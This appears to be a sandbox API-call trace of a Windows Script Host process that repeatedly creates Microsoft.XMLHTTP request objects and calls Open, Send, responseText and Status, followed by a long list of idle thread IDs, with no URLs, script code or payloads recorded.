	[0968.661] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0968.661] SysStringLen (param_1=0x0) returned 0x0
	[0968.661] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0968.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0968.661] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0968.661] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0968.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0968.661] ??2@YAPEAX_K@Z () returned 0x62f310
	[0968.661] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0968.661] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0968.661] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0968.661] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0968.662] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0968.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.662] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0968.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0968.662] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0968.662] SysStringLen (param_1=0x0) returned 0x0
	[0968.662] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0968.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0968.662] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0968.662] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0968.662] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0968.662] ??2@YAPEAX_K@Z () returned 0x62f330
	[0968.662] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0968.663] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0968.663] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0968.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0968.663] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0968.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.663] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0968.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0968.663] longjmp () 
	[0968.663] longjmp () 
	[0968.663] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0968.663] SysStringLen (param_1=0x0) returned 0x0
	[0968.663] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0968.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0968.664] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0968.664] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0968.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0968.664] ??2@YAPEAX_K@Z () returned 0x62f310
	[0968.664] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0968.664] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0968.664] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0968.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0968.664] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0968.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.664] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0968.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0968.665] longjmp () 
	[0968.665] longjmp () 
	[0968.665] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0968.665] SysStringLen (param_1=0x0) returned 0x0
	[0968.665] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0968.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0968.665] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0968.665] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0968.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0968.665] ??2@YAPEAX_K@Z () returned 0x62f330
	[0968.665] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f330) 
	[0968.665] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0968.665] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0968.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0968.665] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0968.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.666] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0968.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0968.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0968.666] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0968.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0970.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0970.733] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0970.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0970.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0970.734] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0970.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002

Thread:
	id = 2
	os_tid = 0xb58


Thread:
	id = 3
	os_tid = 0xb5c

	[0198.189] GetClassInfoA (in: hInstance=0xff910000, lpClassName="WSH-Timer", lpWndClass=0x26dfa00 | out: lpWndClass=0x26dfa00) returned 0
	[0198.189] RegisterClassA (lpWndClass=0x26dfa00) returned 0x9006ac13e
	[0198.189] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff910000, lpParam=0x625910) returned 0x500ea
	[0198.190] GetWindowLongPtrA (hWnd=0x500ea, nIndex=-21) returned 0x0
	[0198.190] NtdllDefWindowProc_A (hWnd=0x500ea, Msg=0x24, wParam=0x0, lParam=0x26df3f0) returned 0x0
	[0198.190] GetWindowLongPtrA (hWnd=0x500ea, nIndex=-21) returned 0x0
	[0198.190] SetWindowLongPtrA (hWnd=0x500ea, nIndex=-21, dwNewLong=0x625910) returned 0x0
	[0198.190] NtdllDefWindowProc_A (hWnd=0x500ea, Msg=0x81, wParam=0x0, lParam=0x26df3b0) returned 0x1
	[0198.191] GetWindowLongPtrA (hWnd=0x500ea, nIndex=-21) returned 0x625910
	[0198.191] NtdllDefWindowProc_A (hWnd=0x500ea, Msg=0x83, wParam=0x0, lParam=0x26df410) returned 0x0
	[0198.667] GetWindowLongPtrA (hWnd=0x500ea, nIndex=-21) returned 0x625910
	[0198.667] NtdllDefWindowProc_A (hWnd=0x500ea, Msg=0x1, wParam=0x0, lParam=0x26df3b0) returned 0x0
	[0198.667] SetEvent (hEvent=0xd8) returned 1
	[0198.890] GetMessageA (lpMsg=0x26df9d0, hWnd=0x500ea, wMsgFilterMin=0x0, wMsgFilterMax=0x0) 

Thread:
	id = 4
	os_tid = 0xb68


Thread:
	id = 5
	os_tid = 0xb6c

	[0247.091] DllCanUnloadNow () returned 0x0
	[0247.092] free (_Block=0x627670) 

Thread:
	id = 6
	os_tid = 0xb78


Thread:
	id = 7
	os_tid = 0xb7c


Thread:
	id = 8
	os_tid = 0xb80


Thread:
	id = 9
	os_tid = 0xb8c


Thread:
	id = 10
	os_tid = 0xb90


Thread:
	id = 11
	os_tid = 0xb94


Thread:
	id = 23
	os_tid = 0xbf4


Thread:
	id = 25
	os_tid = 0xbfc


Thread:
	id = 26
	os_tid = 0x548


Thread:
	id = 28
	os_tid = 0x5e8


Thread:
	id = 30
	os_tid = 0x828


Thread:
	id = 32
	os_tid = 0x824


Thread:
	id = 34
	os_tid = 0x4a0


Thread:
	id = 36
	os_tid = 0x12c


Thread:
	id = 48
	os_tid = 0x68c


Thread:
	id = 50
	os_tid = 0x48c


Thread:
	id = 57
	os_tid = 0x46c


Thread:
	id = 69
	os_tid = 0x910


Thread:
	id = 71
	os_tid = 0x938


Thread:
	id = 78
	os_tid = 0x998


Thread:
	id = 86
	os_tid = 0x9d0


Thread:
	id = 90
	os_tid = 0xa38


Thread:
	id = 98
	os_tid = 0x30c


Thread:
	id = 101
	os_tid = 0x5e4


Thread:
	id = 108
	os_tid = 0x114


Thread:
	id = 113
	os_tid = 0x738


Thread:
	id = 115
	os_tid = 0x648


Thread:
	id = 119
	os_tid = 0xaa4


Thread:
	id = 124
	os_tid = 0x3c0


Thread:
	id = 126
	os_tid = 0xab8


Thread:
	id = 129
	os_tid = 0xafc


Thread:
	id = 139
	os_tid = 0xb84


Thread:
	id = 145
	os_tid = 0xb28


Thread:
	id = 154
	os_tid = 0x5e8


Thread:
	id = 163
	os_tid = 0x884


Thread:
	id = 166
	os_tid = 0x9bc


Thread:
	id = 168
	os_tid = 0xbac


Thread:
	id = 170
	os_tid = 0x9a8


Thread:
	id = 175
	os_tid = 0x738


Thread:
	id = 181
	os_tid = 0x6ec


Thread:
	id = 183
	os_tid = 0xb84


Thread:
	id = 190
	os_tid = 0x5e8


Thread:
	id = 196
	os_tid = 0x6ec


Thread:
	id = 207
	os_tid = 0xc0c


Thread:
	id = 219
	os_tid = 0xc50


Thread:
	id = 222
	os_tid = 0xc70


Thread:
	id = 225
	os_tid = 0xc88


Thread:
	id = 228
	os_tid = 0xcb0


Thread:
	id = 237
	os_tid = 0xce8


Thread:
	id = 248
	os_tid = 0xd2c


Thread:
	id = 262
	os_tid = 0xd7c


Thread:
	id = 271
	os_tid = 0xdb8


Thread:
	id = 276
	os_tid = 0xdd4


Thread:
	id = 279
	os_tid = 0xdf8


Thread:
	id = 287
	os_tid = 0xe30


Thread:
	id = 290
	os_tid = 0xe54


Thread:
	id = 292
	os_tid = 0xe74


Thread:
	id = 295
	os_tid = 0xe88


Thread:
	id = 298
	os_tid = 0xea8


Thread:
	id = 300
	os_tid = 0xebc


Thread:
	id = 302
	os_tid = 0xed0


Thread:
	id = 304
	os_tid = 0xef4


Thread:
	id = 306
	os_tid = 0xf0c


Thread:
	id = 318
	os_tid = 0xf74


Thread:
	id = 333
	os_tid = 0xffc


Thread:
	id = 338
	os_tid = 0xc6c


Thread:
	id = 342
	os_tid = 0xbf0


Thread:
	id = 345
	os_tid = 0xc94


Thread:
	id = 349
	os_tid = 0x8ac


Thread:
	id = 352
	os_tid = 0x520


Thread:
	id = 360
	os_tid = 0xbbc


Thread:
	id = 363
	os_tid = 0xe74


Thread:
	id = 379
	os_tid = 0x60c


Thread:
	id = 447
	os_tid = 0x10e8


Thread:
	id = 463
	os_tid = 0x113c


Thread:
	id = 465
	os_tid = 0x114c


Thread:
	id = 471
	os_tid = 0x1178


Thread:
	id = 475
	os_tid = 0x119c


Thread:
	id = 479
	os_tid = 0x11bc


Thread:
	id = 487
	os_tid = 0x11fc


Thread:
	id = 490
	os_tid = 0x1210


Thread:
	id = 501
	os_tid = 0x1258


Thread:
	id = 506
	os_tid = 0x1278


Thread:
	id = 512
	os_tid = 0x12ac


Thread:
	id = 515
	os_tid = 0x12c4


Thread:
	id = 521
	os_tid = 0x12fc


Thread:
	id = 526
	os_tid = 0x1324


Thread:
	id = 531
	os_tid = 0x134c


Thread:
	id = 533
	os_tid = 0x135c


Thread:
	id = 535
	os_tid = 0x1380


Thread:
	id = 545
	os_tid = 0x13c8


Thread:
	id = 552
	os_tid = 0x13e8


Thread:
	id = 560
	os_tid = 0xc78


Thread:
	id = 566
	os_tid = 0xc14


Thread:
	id = 570
	os_tid = 0xcc4


Thread:
	id = 574
	os_tid = 0x7c8


Thread:
	id = 583
	os_tid = 0xd44


Thread:
	id = 586
	os_tid = 0x11e0


Thread:
	id = 590
	os_tid = 0xa18


Thread:
	id = 594
	os_tid = 0xb08


Thread:
	id = 599
	os_tid = 0x12c4


Thread:
	id = 604
	os_tid = 0x131c


Thread:
	id = 606
	os_tid = 0x137c


Thread:
	id = 608
	os_tid = 0x13b8


Thread:
	id = 613
	os_tid = 0xfe0


Thread:
	id = 616
	os_tid = 0xfa4


Thread:
	id = 622
	os_tid = 0xb08


Thread:
	id = 625
	os_tid = 0x11b8


Thread:
	id = 634
	os_tid = 0x140c


Thread:
	id = 656
	os_tid = 0x1474


Thread:
	id = 664
	os_tid = 0x14ac


Thread:
